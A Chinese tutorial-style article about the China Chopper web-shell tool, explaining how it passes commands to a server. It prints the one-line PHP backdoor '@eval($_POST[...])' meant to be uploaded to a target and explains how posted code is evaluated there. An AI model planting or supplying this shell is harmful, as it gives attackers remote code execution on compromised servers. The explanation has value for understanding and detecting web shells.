中国菜刀执行过程
- > 工具软件 > 正文
- 中国菜刀执行过程
- 2013-06-07
作者:0x007
-
我要投稿
-
对于玩渗透的人来说 一句话 中国菜刀 肯定不陌生 那么菜刀到底是怎么样判断他的密码呢? 如何列目录的呢? 我们一一来进行科普下。
一句话:<?php @eval($_POST[fuck])?>
这是php的一句话密码。不懂的人来说 这怎么样是木马呢? 这明明是正常的php语法。别着急,慢慢讲解。
上面的一句话是服务端 也就是说 他等待post提交变量名fuck的数据
现在是逆向思维 我们先用正向思维去看
<form action="a.php" method="post">
name: <input type="text" name="fuck" />
<input type="submit" />
</form>
http://www.zjjv.com//a.php
Welcome <?php echo $_POST["fuck"]; ?>.<br />这个代码 你们肯定都熟悉 post提交变量名为fuck的数据给a.php 之后输出
那菜刀就是你先把接受端上传到服务器 之后我们自己提交数据给接收端
例:<?php @eval($_POST[fuck])?>
那么提交的时候肯定是post提交数据 之后执行的相应的代码,比如说列目录?写文件?等等 fuck=.......代码 接收端接受到之后eval执行 执行之后会出现相应值。那么菜刀再去读取。
至于密码这里 我这样解释了 相信大家也看的清楚了 为何还有密码这个说法。 因为接收端的fuck,你输入123的变量去提交 接受端不认识123变量是什么 那里来的,所以就无法执行。
菜刀通讯加密使用base64
- 点击复制链接 与好友分享!回本站首页
- 上一篇:Hydra安装Libssh模块
- 下一篇:metasploit升级后无法加载模块的解决办法
- 相关文章
卡巴斯基为中国用户提供“地震专用Key
中国菜刀遇上了PHP6
中国菜刀登陆密码清除工具(附脱壳、破
linux下运行中国菜刀
正视中国菜刀的功能
强大的Web管理软件,中国菜刀(choppe
Fireeye对中国菜刀的剖析 – Part II
中国菜刀的另一种妙用
中国烧鹅系列:利用烧鹅自动获得反弹S
如何给中国菜刀添加隐蔽后门
- 图文推荐
- 如何在Linux上使用NM
- 渗透测试之学习使用m
- 优化SQLMAP的批量测试
- 轻松保护网络的十大基